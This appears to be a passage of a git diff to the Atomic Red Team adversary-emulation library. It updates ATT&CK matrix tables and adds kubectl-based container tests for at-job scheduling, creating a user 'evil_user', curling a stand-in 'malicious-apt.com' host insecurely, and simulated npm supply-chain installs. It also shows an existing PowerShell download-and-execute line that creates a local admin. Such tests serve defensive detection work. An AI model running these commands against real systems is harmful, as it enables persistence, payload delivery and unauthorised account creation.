Amplification [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |
 | Valid Accounts [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Scheduled Task/Job: Systemd Timers](../../T1053.006/T1053.006.md) | Scheduled Task/Job [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Event Triggered Execution: Trap](../../T1546.005/T1546.005.md) | Bootkit [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Ccache Files [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Peripheral Device Discovery [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |  | Remote Data Staging [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Exfiltration over USB [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Protocol Tunneling](../../T1572/T1572.md) | Service Exhaustion Flood [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |
 | Spearphishing Voice [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Command and Scripting Interpreter: Bash](../../T1059.004/T1059.004.md) | [Browser Extensions](../../T1176/T1176.md) | [Hijack Execution Flow: LD_PRELOAD](../../T1574.006/T1574.006.md) | [Masquerading: Match Legitimate Name or Location](../../T1036.005/T1036.005.md) | Steal or Forge Kerberos Tickets [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [System Information Discovery](../../T1082/T1082.md) |  | [Data from Local System](../../T1005/T1005.md) | Exfiltration Over Web Service: Exfiltration to Text Storage Sites [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Mail Protocols [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Defacement [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |
-| Compromise Software Supply Chain [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Inter-Process Communication [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Additional Local or Domain Groups [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Abuse Elevation Control Mechanism [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Masquerade File Type [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Credentials from Password Stores [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | System Network Configuration Discovery: Wi-Fi Discovery [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |  | [Archive Collected Data: Archive via Library](../../T1560.002/T1560.002.md) | [Exfiltration Over Web Service: Exfiltration to Cloud Storage](../../T1567.002/T1567.002.md) | Communication Through Removable Media [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Bandwidth Hijacking [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |
+| [Compromise Software Supply Chain](../../T1195.002/T1195.002.md) | Inter-Process Communication [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Additional Local or Domain Groups [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Abuse Elevation Control Mechanism [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Masquerade File Type [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Credentials from Password Stores [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | System Network Configuration Discovery: Wi-Fi Discovery [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |  | [Archive Collected Data: Archive via Library](../../T1560.002/T1560.002.md) | [Exfiltration Over Web Service: Exfiltration to Cloud Storage](../../T1567.002/T1567.002.md) | Communication Through Removable Media [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Bandwidth Hijacking [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |
 | Domain Accounts [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Lua [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Traffic Signaling [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Abuse Elevation Control Mechanism: Setuid and Setgid](../../T1548.001/T1548.001.md) | Hide Artifacts [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Unsecured Credentials](../../T1552/T1552.md) | Application Window Discovery [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |  | Archive Collected Data [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Data Transfer Size Limits](../../T1030/T1030.md) | External Proxy [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Financial Theft [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |
 | Hardware Additions [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Exploitation for Client Execution [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Server Software Component: Web Shell [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [SSH Authorized Keys](../../T1098.004/T1098.004.md) | [Virtualization/Sandbox Evasion: System Checks](../../T1497.001/T1497.001.md) | [Credentials from Password Stores: Credentials from Web Browsers](../../T1555.003/T1555.003.md) | [Time Based Evasion](../../T1497.003/T1497.003.md) |  | DHCP Spoofing [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Exfiltration Over Physical Medium [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Proxy [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Defacement: Internal Defacement [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |
 | Drive-by Compromise [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Command and Scripting Interpreter: Python](../../T1059.006/T1059.006.md) | Valid Accounts: Default Accounts [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | VDSO Hijacking [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Indicator Removal on Host: Clear FreeBSD, Linux or Mac System Logs](../../T1070.002/T1070.002.md) | DHCP Spoofing [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Browser Bookmark Discovery](../../T1217/T1217.md) |  | Web Portal Capture [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Exfiltration Over Alternative Protocol: Exfiltration Over Unencrypted/Obfuscated Non-C2 Protocol](../../T1048.003/T1048.003.md) | IDE Tunneling [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Compute Hijacking [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |

atomics/Indexes/Matrices/matrix.md

@@ -15,7 +15,7 @@
 | Phishing [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Command and Scripting Interpreter: AppleScript](../../T1059.002/T1059.002.md) | [Hijack Execution Flow: Services Registry Permissions Weakness](../../T1574.011/T1574.011.md) | [Boot or Logon Autostart Execution](../../T1547/T1547.md) | [Direct Volume Access](../../T1006/T1006.md) | [OS Credential Dumping: LSA Secrets](../../T1003.004/T1003.004.md) | [System Service Discovery](../../T1007/T1007.md) | [Remote Services: Distributed Component Object Model](../../T1021.003/T1021.003.md) | [Email Collection: Local Email Collection](../../T1114.001/T1114.001.md) | [Exfiltration Over Alternative Protocol](../../T1048/T1048.md) | [Protocol Tunneling](../../T1572/T1572.md) | Runtime Data Manipulation [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |
 | Valid Accounts [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Native API](../../T1106/T1106.md) | Bootkit [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Active Setup](../../T1547.014/T1547.014.md) | Modify Cloud Resource Hierarchy [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Forge Web Credentials: SAML token](../../T1606.002/T1606.002.md) | [Network Sniffing](../../T1040/T1040.md) | [Use Alternate Authentication Material: Pass the Ticket](../../T1550.003/T1550.003.md) | [Automated Collection](../../T1119/T1119.md) | Exfiltration over USB [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Mail Protocols [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Reflection Amplification [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |
 | Spearphishing Voice [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Command and Scripting Interpreter: AutoHotKey & AutoIT](../../T1059.010/T1059.010.md) | [Boot or Logon Autostart Execution](../../T1547/T1547.md) | [Domain Trust Modification](../../T1484.002/T1484.002.md) | [Hide Artifacts: Email Hiding Rules](../../T1564.008/T1564.008.md) | [OS Credential Dumping: Proc Filesystem](../../T1003.007/T1003.007.md) | [Network Share Discovery](../../T1135/T1135.md) | Cloud Services [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Clipboard Data](../../T1115/T1115.md) | [Exfiltration Over Web Service: Exfiltration to Text Storage Sites](../../T1567.003/T1567.003.md) | Communication Through Removable Media [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Service Exhaustion Flood [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |
-| Compromise Software Supply Chain [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Systemctl [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Active Setup](../../T1547.014/T1547.014.md) | [Create or Modify System Process: Windows Service](../../T1543.003/T1543.003.md) | [Obfuscated Files or Information: Encrypted/Encoded File](../../T1027.013/T1027.013.md) | Password Managers [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Peripheral Device Discovery](../../T1120/T1120.md) | [Software Deployment Tools](../../T1072/T1072.md) | [Data from Cloud Storage Object](../../T1530/T1530.md) | [Exfiltration Over Web Service: Exfiltration to Cloud Storage](../../T1567.002/T1567.002.md) | External Proxy [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Defacement [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |
+| [Compromise Software Supply Chain](../../T1195.002/T1195.002.md) | Systemctl [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Active Setup](../../T1547.014/T1547.014.md) | [Create or Modify System Process: Windows Service](../../T1543.003/T1543.003.md) | [Obfuscated Files or Information: Encrypted/Encoded File](../../T1027.013/T1027.013.md) | Password Managers [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Peripheral Device Discovery](../../T1120/T1120.md) | [Software Deployment Tools](../../T1072/T1072.md) | [Data from Cloud Storage Object](../../T1530/T1530.md) | [Exfiltration Over Web Service: Exfiltration to Cloud Storage](../../T1567.002/T1567.002.md) | External Proxy [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Defacement [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |
 | Domain Accounts [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Cloud API [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Browser Extensions [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Scheduled Task/Job: Cron](../../T1053.003/T1053.003.md) | [Rootkit](../../T1014/T1014.md) | [Network Sniffing](../../T1040/T1040.md) | [System Information Discovery](../../T1082/T1082.md) | Exploitation of Remote Services [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Remote Data Staging [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Data Transfer Size Limits](../../T1030/T1030.md) | Proxy [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Bandwidth Hijacking [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |
 | Hardware Additions [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Deploy a container](../../T1610/T1610.md) | TFTP Boot [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Account Manipulation: Additional Cloud Roles](../../T1098.003/T1098.003.md) | [Masquerading: Double File Extension](../../T1036.007/T1036.007.md) | [Unsecured Credentials: Credentials in Registry](../../T1552.002/T1552.002.md) | [System Network Configuration Discovery: Wi-Fi Discovery](../../T1016.002/T1016.002.md) | Internal Spearphishing [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Data from Local System](../../T1005/T1005.md) | Transfer Data to Cloud Account [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | IDE Tunneling [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Financial Theft [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |
 | Drive-by Compromise [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Input Injection [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Create or Modify System Process: Windows Service](../../T1543.003/T1543.003.md) | [Boot or Logon Autostart Execution: Print Processors](../../T1547.012/T1547.012.md) | [Abuse Elevation Control Mechanism: Bypass User Account Control](../../T1548.002/T1548.002.md) | [Modify Authentication Process: Password Filter DLL](../../T1556.002/T1556.002.md) | [Application Window Discovery](../../T1010/T1010.md) | [Lateral Tool Transfer](../../T1570/T1570.md) | [Archive Collected Data: Archive via Library](../../T1560.002/T1560.002.md) | Exfiltration Over Physical Medium [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Dynamic Resolution [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Defacement: Internal Defacement](../../T1491.001/T1491.001.md) |

atomics/Indexes/azure-ad-index.yaml

@@ -63319,6 +63319,7 @@ initial-access:
       x_mitre_version: '1.1'
       x_mitre_data_sources:
       - 'File: File Metadata'
+      identifier: T1195.002
     atomic_tests: []
   T1078.002:
     technique:

atomics/Indexes/containers-index.yaml

@@ -24222,7 +24222,48 @@ privilege-escalation:
       - 'Process: Process Creation'
       - 'File: File Modification'
       identifier: T1053.002
-    atomic_tests: []
+    atomic_tests:
+    - name: At - Schedule a job via kubectl in a Pod
+      auto_generated_guid: 9ddf2e5e-7e2c-46c2-9940-3c2ff29c7213
+      description: |
+        Launches a short-lived Ubuntu pod, installs the `at` utility, starts the `atd` daemon,
+        and submits a job with `at`. The pod is deleted after execution.
+      supported_platforms:
+      - containers
+      input_arguments:
+        image_name:
+          description: Name of the image
+          type: string
+          default: ubuntu
+        pod_name:
+          description: K8s pod name to execute the command in
+          type: string
+          default: atomic-at-schedule
+        time_spec:
+          description: Time specification of when the command should run
+          type: string
+          default: now + 1 minute
+        at_command:
+          description: The command to be run
+          type: string
+          default: echo Hello from Atomic Red Team
+      dependencies:
+      - description: kubectl must be installed and configured
+        get_prereq_command: 'echo "kubectl must be installed manually"
+
+          '
+        prereq_command: 'which kubectl
+
+          '
+      executor:
+        name: bash
+        elevation_required: false
+        command: 'kubectl run #{pod_name} --image=#{image_name} --restart=Never --attach
+          --rm -i -- bash -lc "apt-get update -y >/dev/null 2>&1 && apt-get install
+          -y at >/dev/null 2>&1 && (atd || /usr/sbin/atd) && echo ''#{at_command}''
+          | at #{time_spec} && at -l"
+
+          '
   T1055.001:
     technique:
       type: attack-pattern
@@ -27881,7 +27922,48 @@ execution:
       - 'Process: Process Creation'
       - 'File: File Modification'
       identifier: T1053.002
-    atomic_tests: []
+    atomic_tests:
+    - name: At - Schedule a job via kubectl in a Pod
+      auto_generated_guid: 9ddf2e5e-7e2c-46c2-9940-3c2ff29c7213
+      description: |
+        Launches a short-lived Ubuntu pod, installs the `at` utility, starts the `atd` daemon,
+        and submits a job with `at`. The pod is deleted after execution.
+      supported_platforms:
+      - containers
+      input_arguments:
+        image_name:
+          description: Name of the image
+          type: string
+          default: ubuntu
+        pod_name:
+          description: K8s pod name to execute the command in
+          type: string
+          default: atomic-at-schedule
+        time_spec:
+          description: Time specification of when the command should run
+          type: string
+          default: now + 1 minute
+        at_command:
+          description: The command to be run
+          type: string
+          default: echo Hello from Atomic Red Team
+      dependencies:
+      - description: kubectl must be installed and configured
+        get_prereq_command: 'echo "kubectl must be installed manually"
+
+          '
+        prereq_command: 'which kubectl
+
+          '
+      executor:
+        name: bash
+        elevation_required: false
+        command: 'kubectl run #{pod_name} --image=#{image_name} --restart=Never --attach
+          --rm -i -- bash -lc "apt-get update -y >/dev/null 2>&1 && apt-get install
+          -y at >/dev/null 2>&1 && (atd || /usr/sbin/atd) && echo ''#{at_command}''
+          | at #{time_spec} && at -l"
+
+          '
 persistence:
   T1053.005:
     technique:
@@ -31868,7 +31950,42 @@ persistence:
       - 'Process: Process Creation'
       - 'Command: Command Execution'
       identifier: T1136.001
-    atomic_tests: []
+    atomic_tests:
+    - name: Create a Linux user via kubectl in a Pod
+      auto_generated_guid: d9efa6c7-6518-42b2-809a-4f2a8e242b9b
+      description: |
+        Launches a short-lived Alpine pod and creates a Linux user inside the pod.
+        The pod is automatically deleted after execution.
+      supported_platforms:
+      - containers
+      input_arguments:
+        pod_name:
+          description: K8s pod_name to execute the command in
+          type: string
+          default: atomic-linux-useradd
+        username:
+          description: Username of the user to create inside the pod
+          type: string
+          default: evil_user
+        image_name:
+          description: Name of the docker image
+          type: string
+          default: alpine
+      dependencies:
+      - description: kubectl must be installed and configured
+        get_prereq_command: 'echo "kubectl must be installed manually"
+
+          '
+        prereq_command: 'which kubectl
+
+          '
+      executor:
+        name: bash
+        elevation_required: false
+        command: 'kubectl run #{pod_name} --image=#{image_name} --restart=Never --rm
+          -it -- sh -lc ''adduser -D #{username} && id #{username}''
+
+          '
   T1176.002:
     technique:
       type: attack-pattern
@@ -37108,7 +37225,48 @@ persistence:
       - 'Process: Process Creation'
       - 'File: File Modification'
       identifier: T1053.002
-    atomic_tests: []
+    atomic_tests:
+    - name: At - Schedule a job via kubectl in a Pod
+      auto_generated_guid: 9ddf2e5e-7e2c-46c2-9940-3c2ff29c7213
+      description: |
+        Launches a short-lived Ubuntu pod, installs the `at` utility, starts the `atd` daemon,
+        and submits a job with `at`. The pod is deleted after execution.
+      supported_platforms:
+      - containers
+      input_arguments:
+        image_name:
+          description: Name of the image
+          type: string
+          default: ubuntu
+        pod_name:
+          description: K8s pod name to execute the command in
+          type: string
+          default: atomic-at-schedule
+        time_spec:
+          description: Time specification of when the command should run
+          type: string
+          default: now + 1 minute
+        at_command:
+          description: The command to be run
+          type: string
+          default: echo Hello from Atomic Red Team
+      dependencies:
+      - description: kubectl must be installed and configured
+        get_prereq_command: 'echo "kubectl must be installed manually"
+
+          '
+        prereq_command: 'which kubectl
+
+          '
+      executor:
+        name: bash
+        elevation_required: false
+        command: 'kubectl run #{pod_name} --image=#{image_name} --restart=Never --attach
+          --rm -i -- bash -lc "apt-get update -y >/dev/null 2>&1 && apt-get install
+          -y at >/dev/null 2>&1 && (atd || /usr/sbin/atd) && echo ''#{at_command}''
+          | at #{time_spec} && at -l"
+
+          '
   T1556:
     technique:
       type: attack-pattern
@@ -40196,7 +40354,40 @@ command-and-control:
       - 'Command: Command Execution'
       - 'Network Traffic: Network Connection Creation'
       identifier: T1105
-    atomic_tests: []
+    atomic_tests:
+    - name: Curl Insecure Connection from a Pod
+      auto_generated_guid: 7e2ad0db-1efa-4af2-a77c-bc6e87d7b3f3
+      description: |
+        Launches an Ubuntu pod, installs curl, and executes curl with insecure flags (-k/--insecure)
+        against a target URL. The pod is automatically deleted after execution.
+      supported_platforms:
+      - containers
+      input_arguments:
+        pod_name:
+          description: K8s pod_name to execute the command in
+          type: string
+          default: atomic-insecure-curl
+        remote_url:
+          description: Remote URL to curl
+          type: string
+          default: https://malicious-apt.com
+        image_name:
+          description: Name of the docker image
+          type: string
+          default: curlimages/curl
+      dependencies:
+      - description: kubectl must be installed and configured
+        get_prereq_command: 'echo "kubectl must be installed manually"
+
+          '
+        prereq_command: 'which kubectl
+
+          '
+      executor:
+        name: bash
+        elevation_required: false
+        command: 'kubectl run #{pod_name} --image=#{image_name} --restart=Never --rm
+          -it -- curl -ksL #{remote_url}'
   T1665:
     technique:
       type: attack-pattern
@@ -62473,7 +62664,47 @@ initial-access:
       x_mitre_version: '1.1'
       x_mitre_data_sources:
       - 'File: File Metadata'
-    atomic_tests: []
+      identifier: T1195.002
+    atomic_tests:
+    - name: Simulate npm package installation on a Linux system
+      auto_generated_guid: a9604672-cd46-493b-b58f-fd4124c22dd3
+      description: 'Launches a short‑lived Kubernetes pod using the Node 18 image,
+        initializes a minimal npm project in /tmp/test, and installs the specified
+        npm package without audit/fund/package‑lock options, simulating potentially
+        suspicious package retrieval (e.g., typosquatting/dependency confusion) from
+        within a container. The pod is deleted after execution.
+
+        '
+      supported_platforms:
+      - containers
+      - linux
+      input_arguments:
+        image_name:
+          description: Name of the image
+          type: string
+          default: node:18
+        pod_name:
+          description: Name of the pod
+          type: string
+          default: atomic-npm-install
+        package_name:
+          description: NPM package to install
+          type: string
+          default: tinycolor
+      dependencies:
+      - description: kubectl must be installed and configured
+        get_prereq_command: echo "kubectl must be installed"
+        prereq_command: which kubectl
+      executor:
+        name: bash
+        elevation_required: false
+        command: 'kubectl run #{pod_name} --image=#{image_name} --restart=Never --attach
+          --rm -i -- bash -lc "mkdir -p /tmp/test && cd /tmp/test && npm init -y >/dev/null
+          2>&1 && echo ''--- package.json before install ---'' && cat package.json
+          && npm install #{package_name} --no-audit --no-fund --no-package-lock &&
+          echo ''--- package.json after install ---'' && cat package.json"
+
+          '
   T1078.002:
     technique:
       type: attack-pattern

atomics/Indexes/esxi-index.yaml

@@ -61674,6 +61674,7 @@ initial-access:
       x_mitre_version: '1.1'
       x_mitre_data_sources:
       - 'File: File Metadata'
+      identifier: T1195.002
     atomic_tests: []
   T1078.002:
     technique:

atomics/Indexes/google-workspace-index.yaml

@@ -61848,6 +61848,7 @@ initial-access:
       x_mitre_version: '1.1'
       x_mitre_data_sources:
       - 'File: File Metadata'
+      identifier: T1195.002
     atomic_tests: []
   T1078.002:
     technique:

atomics/Indexes/iaas-index.yaml

@@ -61674,6 +61674,7 @@ initial-access:
       x_mitre_version: '1.1'
       x_mitre_data_sources:
       - 'File: File Metadata'
+      identifier: T1195.002
     atomic_tests: []
   T1078.002:
     technique:

atomics/Indexes/iaas_aws-index.yaml

@@ -62752,6 +62752,7 @@ initial-access:
       x_mitre_version: '1.1'
       x_mitre_data_sources:
       - 'File: File Metadata'
+      identifier: T1195.002
     atomic_tests: []
   T1078.002:
     technique:

atomics/Indexes/iaas_azure-index.yaml

@@ -63058,6 +63058,7 @@ initial-access:
       x_mitre_version: '1.1'
       x_mitre_data_sources:
       - 'File: File Metadata'
+      identifier: T1195.002
     atomic_tests: []
   T1078.002:
     technique:

atomics/Indexes/iaas_gcp-index.yaml

@@ -62338,6 +62338,7 @@ initial-access:
       x_mitre_version: '1.1'
       x_mitre_data_sources:
       - 'File: File Metadata'
+      identifier: T1195.002
     atomic_tests: []
   T1078.002:
     technique:

atomics/Indexes/index.yaml

@@ -6569,10 +6569,9 @@ defense-evasion:
           type: path
           default: myapp.app
       executor:
-        command: 'sudo xattr -d com.apple.quarantine #{app_path}
+        command: 'xattr -d com.apple.quarantine #{app_path}
 
           '
-        elevation_required: true
         name: sh
   T1553.002:
     technique:
@@ -51009,6 +51008,47 @@ privilege-escalation:
         name: sh
         elevation_required: false
         command: 'echo "#{at_command}" | at #{time_spec}'
+    - name: At - Schedule a job via kubectl in a Pod
+      auto_generated_guid: 9ddf2e5e-7e2c-46c2-9940-3c2ff29c7213
+      description: |
+        Launches a short-lived Ubuntu pod, installs the `at` utility, starts the `atd` daemon,
+        and submits a job with `at`. The pod is deleted after execution.
+      supported_platforms:
+      - containers
+      input_arguments:
+        image_name:
+          description: Name of the image
+          type: string
+          default: ubuntu
+        pod_name:
+          description: K8s pod name to execute the command in
+          type: string
+          default: atomic-at-schedule
+        time_spec:
+          description: Time specification of when the command should run
+          type: string
+          default: now + 1 minute
+        at_command:
+          description: The command to be run
+          type: string
+          default: echo Hello from Atomic Red Team
+      dependencies:
+      - description: kubectl must be installed and configured
+        get_prereq_command: 'echo "kubectl must be installed manually"
+
+          '
+        prereq_command: 'which kubectl
+
+          '
+      executor:
+        name: bash
+        elevation_required: false
+        command: 'kubectl run #{pod_name} --image=#{image_name} --restart=Never --attach
+          --rm -i -- bash -lc "apt-get update -y >/dev/null 2>&1 && apt-get install
+          -y at >/dev/null 2>&1 && (atd || /usr/sbin/atd) && echo ''#{at_command}''
+          | at #{time_spec} && at -l"
+
+          '
   T1055.001:
     technique:
       type: attack-pattern
@@ -58940,6 +58980,47 @@ execution:
         name: sh
         elevation_required: false
         command: 'echo "#{at_command}" | at #{time_spec}'
+    - name: At - Schedule a job via kubectl in a Pod
+      auto_generated_guid: 9ddf2e5e-7e2c-46c2-9940-3c2ff29c7213
+      description: |
+        Launches a short-lived Ubuntu pod, installs the `at` utility, starts the `atd` daemon,
+        and submits a job with `at`. The pod is deleted after execution.
+      supported_platforms:
+      - containers
+      input_arguments:
+        image_name:
+          description: Name of the image
+          type: string
+          default: ubuntu
+        pod_name:
+          description: K8s pod name to execute the command in
+          type: string
+          default: atomic-at-schedule
+        time_spec:
+          description: Time specification of when the command should run
+          type: string
+          default: now + 1 minute
+        at_command:
+          description: The command to be run
+          type: string
+          default: echo Hello from Atomic Red Team
+      dependencies:
+      - description: kubectl must be installed and configured
+        get_prereq_command: 'echo "kubectl must be installed manually"
+
+          '
+        prereq_command: 'which kubectl
+
+          '
+      executor:
+        name: bash
+        elevation_required: false
+        command: 'kubectl run #{pod_name} --image=#{image_name} --restart=Never --attach
+          --rm -i -- bash -lc "apt-get update -y >/dev/null 2>&1 && apt-get install
+          -y at >/dev/null 2>&1 && (atd || /usr/sbin/atd) && echo ''#{at_command}''
+          | at #{time_spec} && at -l"
+
+          '
 persistence:
   T1053.005:
     technique:
@@ -67518,6 +67599,41 @@ persistence:
         command: iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/0xv1n/dotnetfun/9b3b0d11d1c156909c0b1823cff3004f80b89b1f/Persistence/CreateNewLocalAdmin_ART.ps1')
         name: powershell
         elevation_required: true
+    - name: Create a Linux user via kubectl in a Pod
+      auto_generated_guid: d9efa6c7-6518-42b2-809a-4f2a8e242b9b
+      description: |
+        Launches a short-lived Alpine pod and creates a Linux user inside the pod.
+        The pod is automatically deleted after execution.
+      supported_platforms:
+      - containers
+      input_arguments:
+        pod_name:
+          description: K8s pod_name to execute the command in
+          type: string
+          default: atomic-linux-useradd
+        username:
+          description: Username of the user to create inside the pod
+          type: string
+          default: evil_user
+        image_name:
+          description: Name of the docker image
+          type: string
+          default: alpine
+      dependencies:
+      - description: kubectl must be installed and configured
+        get_prereq_command: 'echo "kubectl must be installed manually"
+
+          '
+        prereq_command: 'which kubectl
+
+          '
+      executor:
+        name: bash
+        elevation_required: false
+        command: 'kubectl run #{pod_name} --image=#{image_name} --restart=Never --rm
+          -it -- sh -lc ''adduser -D #{username} && id #{username}''
+
+          '
   T1176.002:
     technique:
       type: attack-pattern
@@ -77671,6 +77787,47 @@ persistence:
         name: sh
         elevation_required: false
         command: 'echo "#{at_command}" | at #{time_spec}'
+    - name: At - Schedule a job via kubectl in a Pod
+      auto_generated_guid: 9ddf2e5e-7e2c-46c2-9940-3c2ff29c7213
+      description: |
+        Launches a short-lived Ubuntu pod, installs the `at` utility, starts the `atd` daemon,
+        and submits a job with `at`. The pod is deleted after execution.
+      supported_platforms:
+      - containers
+      input_arguments:
+        image_name:
+          description: Name of the image
+          type: string
+          default: ubuntu
+        pod_name:
+          description: K8s pod name to execute the command in
+          type: string
+          default: atomic-at-schedule
+        time_spec:
+          description: Time specification of when the command should run
+          type: string
+          default: now + 1 minute
+        at_command:
+          description: The command to be run
+          type: string
+          default: echo Hello from Atomic Red Team
+      dependencies:
+      - description: kubectl must be installed and configured
+        get_prereq_command: 'echo "kubectl must be installed manually"
+
+          '
